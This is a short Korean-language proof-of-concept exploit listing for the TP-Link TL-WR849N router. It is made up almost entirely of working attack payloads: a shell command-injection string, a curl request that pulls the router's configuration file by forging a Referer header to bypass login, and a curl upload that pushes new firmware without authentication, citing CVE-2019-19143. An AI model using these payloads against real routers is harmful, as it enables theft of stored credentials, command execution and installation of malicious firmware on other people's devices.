
TP-Link 라우터용 개념 증명(PoC) 익스플로잇으로, 원격 명령 실행 및 인증 우회 취약점을 포함합니다.
페이로드: "$(ls)"
TP LINK TL-WR849N - 원격 명령 실행 PoC
페이로드:
curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
패널에 접근하지 않고 새 펌웨어 업로드
[CVE-2019-19143] 펌웨어 업데이트: 패널에 접근하지 않고 새 펌웨어 업로드
페이로드:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F [email protected] http://192.168.0.2/cgi/confup